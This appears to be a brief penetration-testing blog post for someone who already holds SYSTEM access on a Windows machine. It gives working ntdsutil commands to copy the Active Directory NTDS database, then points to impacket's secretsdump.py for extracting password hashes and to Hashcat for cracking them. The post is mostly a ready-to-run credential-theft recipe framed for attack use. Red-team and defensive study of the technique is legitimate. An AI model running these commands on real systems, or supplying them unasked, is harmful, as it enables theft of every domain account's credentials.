Okay, you’ve gotten System user access on your Windows target, and now you want to get the goodies in Active Directory. Here’s the ultra-short version:
Open Powershell and enter:
ntdsutil
Activate Instance ntds
ifm
create full c:\bak_fldr
quit
quit
Check out this video that details of creating the NTDS backup,
extracting data with secretsdump.py,
https://github.com/SecureAuthCorp/im packet/blob/master/examples/secretsdump.py ,
and cracking password hashes with Hashcat.